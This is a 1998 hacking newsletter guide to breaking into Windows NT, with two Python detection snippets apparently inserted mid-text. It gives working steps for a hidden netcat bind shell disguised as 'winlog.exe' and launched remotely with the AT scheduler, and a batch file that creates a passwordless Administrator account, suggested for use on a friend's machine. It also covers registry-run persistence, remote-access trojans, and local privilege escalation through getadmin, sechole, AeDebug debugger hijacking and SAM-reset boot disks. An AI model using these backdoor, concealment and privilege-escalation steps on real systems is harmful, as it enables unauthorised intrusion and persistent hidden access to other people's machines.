Vol. 3 No. 10 Part 2

How to Break into Windows NT: Backdoors and Practical Jokes (Carolyn's note: this also works with Windows 2000 and XP)

by keydet89@yahoo.com

[Backdoors and Practical Jokes]

Creating backdoors is how you can ensure your ability to return to the
system at will. This is almost a black art when dealing with Un*x
systems, and it can also be done on NT.

netcat, from Weld Pond, takes advantage of any user's ability to use
a local port. netcat is a command-line utility that has several
switches used to configure its operation. This makes netcat, combined
with a properly configured command line launched from a batch file,
an excellent choice for a backdoor.
(get netcat for NT from http://www.l0pht.com/weld)

The batch file needs to contain:

nc -L -d -p [port] -t -e cmd.exe

L   tells netcat to keep listening after the current
    session terminates
d   detach - don't open a DOS window when running (IMPORTANT)
p   which port to bind to
t   enable telnet negotiations
e   command to execute upon connection

Copy this command line into a batch file named "runnc.bat" or
something similar. Then copy both the netcat executable file and
the batch file to a directory that is in the PATH on the target
machine...c:\winnt\system32\ is a good place to hide them. Another
little trick to keep in mind is to rename the netcat executable from
'nc.exe' to something innocuous, like 'winlog.exe' (and make sure to
make the appropriate changes to the batch file). That way, when you
or your buddy opens the TaskList, there won't seem to be any 'unusual'
programs running. Run the batch file on your own machine, and open
the TaskList (right-click on the TaskBar, and choose TaskList)...

Once this batch file is run, all you need to do is connect via telnet,
or netcat in client mode:

c:\>nc -v [ipaddress of target] [port]
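Seen from the defending side, renaming the executable does not change its arguments: the listen, port and execute switches from the batch file still appear in the process command line. The following is an added example, not part of the original guide; the record layout, process names, ports and addresses are constructed sample data, and it assumes you can export a process list with command lines plus a list of (pid, port) listening sockets.

```python
from typing import NamedTuple, Optional

TAKES_ARG = set("egGiopsw")          # netcat 1.1x options that consume a value
SHELLS = {"cmd", "cmd.exe", "command.com"}

class Proc(NamedTuple):
    pid: int
    image: str      # full path of the executable on disk
    cmdline: str    # command line from process-creation logging

def listen_exec_args(cmdline: str) -> Optional[tuple]:
    """Parse getopt-style flags; return (port, program) for a listen+exec line."""
    tokens, opts, i = cmdline.split()[1:], {}, 0
    while i < len(tokens):
        tok = tokens[i]
        i += 1
        if len(tok) < 2 or not tok.startswith("-"):
            continue
        for j, ch in enumerate(tok[1:], start=1):
            if ch not in TAKES_ARG:
                opts[ch] = True              # plain switch, may be bundled (-Ldp)
                continue
            value = tok[j + 1:]              # value glued to the flag (-p4455)
            if not value and i < len(tokens):
                value, i = tokens[i], i + 1  # value is the next token
            opts[ch] = value
            break
    if ("l" in opts or "L" in opts) and opts.get("p", "").isdigit() and "e" in opts:
        return int(opts["p"]), opts["e"]
    return None

def find_shell_listeners(procs, listening):
    """Flag processes started as 'listen on a port, hand connections to a shell'."""
    hits = []
    for p in procs:
        parsed = listen_exec_args(p.cmdline)
        if not parsed:
            continue
        port, prog = parsed
        if prog.replace("/", "\\").rsplit("\\", 1)[-1].lower() in SHELLS:
            hits.append((p.pid, p.image, port, (p.pid, port) in listening))
    return hits

# Constructed sample inventory (not real data): process list plus (pid, port) listeners.
SAMPLE_PROCS = [
    Proc(180, r"C:\WINNT\system32\services.exe", r"C:\WINNT\system32\services.exe"),
    Proc(212, r"C:\WINNT\system32\winlog.exe", "winlog.exe -L -d -p 4455 -t -e cmd.exe"),
    Proc(301, r"C:\tools\nc.exe", "nc -v 10.0.0.5 4455"),
    Proc(330, r"C:\WINNT\system32\svch.exe", "svch.exe -Ldp 5150 -e cmd.exe"),
]
SAMPLE_LISTENING = {(212, 4455), (180, 135)}
```

The last field of each hit says whether a matching listening socket was also seen for that pid, which separates a live listener from one that failed to bind or has already exited.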

So how do you run this batch file? By default, NT doesn't have an
interactive telnet server installed so that you can just log in, so
what do you do? Well, there is a great little service called the
Schedule (or 'AT') service, which lets you schedule programs to be
run at a later date. To see if your Schedule service is running,
you can either click Control Panel -> Services, and check it, or
if you have Perl installed (see above), you can run the following
script to see if the service is running, and if not, start it:

----- begin script -----
# atchk.plx
# Script checks to see if AT service is running on local
# machine...if not, starts it. Minor modifications will
# allow you to do the same thing on a remote machine, once
# you have successfully completed the IPC$ connection and have
# Administrator rights.
# usage: perl atchk.plx

use strict;
use warnings;
use Win32::Service;
use Win32;
my %status;

# Query the Schedule service on the local machine ('' = local host)
Win32::Service::GetStatus('', 'Schedule', \%status)
    || die "Can't query service status\n";
# CurrentState 4 = SERVICE_RUNNING
die "service is already started\n" if ($status{CurrentState} == 4);

Win32::Service::StartService(Win32::NodeName(), 'Schedule')
    || die "Can't start service\n";

print "Service started\n";
#**Note: This script was modified from:
----- end script -----

Note: Only Administrators or members of the Administrators group can
run the AT command.

Once installed, the 'runnc.bat' file can be executed via the AT command.

The necessary syntax for the AT command is:

AT [\\computername] [time] "command"

or more particularly:

AT [\\computername] [time] runnc.bat

References to commands can be hidden in various places within the
registry, set to run when a user logs in:



Note: This last key is where you will find things like AOL's
Instant Messenger. The install puts the reference to the app there,
but you won't find it in your StartUp box...

Here's another little exercise that you should run on your own machine
first, and then try copying it over to a friend's machine and running
it via the AT command. The batch file below uses commands that are
native to NT to create a new user account, then make that user a member
of the Administrator group:

----- begin batch file -----
@echo off
net user Admin /add /expires:never /passwordreq:no
net localgroup "Administrators" /add Admin
net localgroup "Users" /del Admin
----- end batch file -----

What are some other neat little tricks to try? Get Netbus from
http://netbus.hypermart.net/ . This little program is similar to
Back Orifice, and it runs on NT. (Visit the makers of Back Orifice
at http://www.cultdeadcow.com/)

Okay, so you and your 'leet buddies have played around with each
other's machines via the Internet, and pretty much walked through the
exercises listed above. Now, what are some local 'attacks' that you
can run against your own machine?

[Local Attacks]

Let's say you have a couple of accounts on your NT box, at least one
with Admin rights, and one or two others with user rights. You've
already run through the password cracking exercise and seen how easy
it is to get the 'SAM._' file and crack it. So what else can you do?

Well, you try the 'getadmin' exploit. This exploit consists of a
program and .dll file that will add the user to the Administrator group.

Get the necessary files from:


The Microsoft site has a hotfix for the "getadmin" exploit, located


General information on security problems addressed by Microsoft
can be found at:


For more information on the 'getadmin' exploit, go to:


and search for 'getadmin'.

All you need to do to test this exploit is log onto your system via
a user account, copy the files into a directory, and run getadmin.exe.

Another local exploit similar to the "getadmin" exploit has popped up.
The exploit works like this: the user runs a program called
"sechole.exe" and the final result (possibly after a reboot) is that
the user now has administrator rights! For more information on this
and the zipped archive "sechole.zip", go to:

A variation on this exploit involves the Registry setting that
determines which default debugger (the program run when a user mode
program crashes) is run.
Usually, the setting is:
Key: \Software\Microsoft\Windows NT\CurrentVersion\AeDebug
Value: Debugger
Data Type: REG_SZ
Default Value: drwtsn32 -p %ld -e %ld -g

The "Everyone" group has the ability to set the value of this key, which
is essentially how you can exploit it. The debugger runs in the security
context of the crashed application, so all you need to do is change the
Default Value (via 'regedit') to point to the User Manager, and then
crash one of the services that are running. Then you can add accounts
to the User Manager...even to the Administrator group.
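To check a machine for this weakness, audit two things: whether the Debugger value still names the default program, and whether the key's access control list lets a broad group set values. The following is an added example, not part of the original guide; it assumes the Debugger data and the key's security descriptor have been exported as an SDDL string, and the sample strings and the replacement debugger path are constructed.

```python
import re

KEY_SET_VALUE, GENERIC_WRITE, GENERIC_ALL = 0x0002, 0x40000000, 0x10000000
SETS_VALUE = {"KA", "KW", "GA", "GW", "DC"}   # SDDL rights that include KEY_SET_VALUE
BROAD_SIDS = {"WD": "Everyone", "S-1-1-0": "Everyone", "AU": "Authenticated Users",
              "BU": "Users", "IU": "Interactive", "AN": "Anonymous"}
EXPECTED_DEBUGGER = "drwtsn32"                # default named in the guide

def pairs(s):
    """Split an SDDL flag/rights string into its two-letter tokens."""
    return {s[i:i + 2] for i in range(0, len(s), 2)}

def grants_set_value(rights):
    """True if an ACE rights field (token string or hex mask) allows setting values."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & (KEY_SET_VALUE | GENERIC_WRITE | GENERIC_ALL))
    return bool(pairs(rights) & SETS_VALUE)

def debugger_image(value):
    """Base name (no .exe) of the program the Debugger value would launch."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', value)
    path = (m.group(1) or m.group(2)) if m else ""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name

def audit_aedebug(debugger, sddl):
    """Return findings as (kind, detail) tuples; an empty list means nothing flagged."""
    findings = []
    image = debugger_image(debugger)
    if image != EXPECTED_DEBUGGER:
        findings.append(("debugger-changed", image))
    for ace in re.findall(r"\(([^)]*)\)", sddl):
        fields = ace.split(";")
        if len(fields) < 6 or fields[0] != "A" or "IO" in pairs(fields[1]):
            continue                          # not an allow ACE that applies to this key
        if fields[5] in BROAD_SIDS and grants_set_value(fields[2]):
            findings.append(("writable-by", BROAD_SIDS[fields[5]]))
    return findings

# Constructed inputs (not captured from a real host).
WEAK_SDDL = "O:BAG:SYD:(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;CCDCLCSWRPRC;;;WD)"
FIXED_SDDL = "O:BAG:SYD:(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;KR;;;WD)"
```

The flag field is split into two-letter tokens before testing for inherit-only, because a plain substring search would wrongly find "IO" inside "CIOI".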

NEWBIE NOTE: Before any changes are made to the Registry, make
sure that you make a backup of your current Registry using the
"rdisk /s" utility. You can make changes to the Registry by clicking
Start -> Run, and entering either 'regedit' or 'regedt32'. Before
you attempt any of this, read the files pertaining to the Registry
from the Rhino9 site (, the "Hacker's
Modern Desk Reference" (http://www.antionline.com/SpecialReports/MHD/)
and even "Hardening NT" (http://pw2.netcom.com/~honeyluv/index.html).

Another local exploit that you can attempt uses the NTFSDOS utility,
which is nothing more than a bootable DOS diskette that can read (but
not write to) NTFS partitions. This would potentially allow an attacker
to make off with copies of system files, including the SAM database.
The folks at Systems Internals (http://www.sysinternals.com) have not
only an NTFSDOS utility available, but also some tools that give the
user limited write capability. SysInternals also has NTRecover and
NTLocksmith, along with a variety of other useful tools.

Get a copy of the utility, and try booting your own system with the
diskette in the A:\ drive.

There is a nifty little utility available, one that is essentially a
Linux boot disk:


The utility comes with rawrite.exe, so that DOS and Windows users can
download the utility and create the Linux boot disk.

The utility is an NTFS-bootable minimal kernel, with a small program
that allows the user to change any password in the SAM database.
Alternatively, you can find the Linux binary file (without the
rawrite.exe utility) at:


called bootdisk.bin, and according to the description, this is the
file you are interested in. You will still need to get a copy of
rawrite.exe, in order to write the information to a diskette in a
usable form.

Carefully read the instructions on the web page for the utility
(listed above) and if you are feeling especially '31337', try it out
against your own system.

[Final Words]

By now you should be familiar with some of the methods used to attack
and compromise an NT system. Hopefully, you have seen fit to try out
the exercises on your own system, or against a friend's system (with
permission, of course). And it should start becoming clear what it
takes to secure a system from attack. The first step is to become
familiar with various exploits by regularly visiting such sites as
RootShell (http://www.rootshell.com), the ISS X-Force site
(http://www.iss.net/xforce), NTSecurity (http://www.ntsecurity.net),
and NTBugTraq (http://www.ntbugtraq.com). Then go to the Microsoft
Support (http://support.microsoft.com) and Security
(http://www.microsoft.com/security) sites to see what the 'official'
fixes are...the NTBugTraq site does a great job of keeping track of
the latest hotfixes, and which ones are obsolete. The Microsoft Support
site is especially useful, because you can search for information or
specific KnowledgeBase articles, and print out those that you find
useful. The "Hardening NT" document from Santeria Systems
(http://pw2.netcom.com/~honeyluv/index.html) provides an excellent
guide for protecting your system, complete with references to the
appropriate KnowledgeBase article for each step. Finally, Microsoft
maintains a list of security bulletins at:

Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org.
We are against computer crime. We support good, old-fashioned hacking of the
kind that led to the creation of the Internet and a new era of freedom of
information. But we hate computer crime. So don't email us about any crimes
you have committed!
To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless
Hacking, please email hacker@cmeinel.com with message "subscribe
happy-hacker" in the body of your message.
© 1998 keydet89. You may forward, print out or post this
GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave
this notice at the end.



© 2002 Happy Hacker All rights reserved.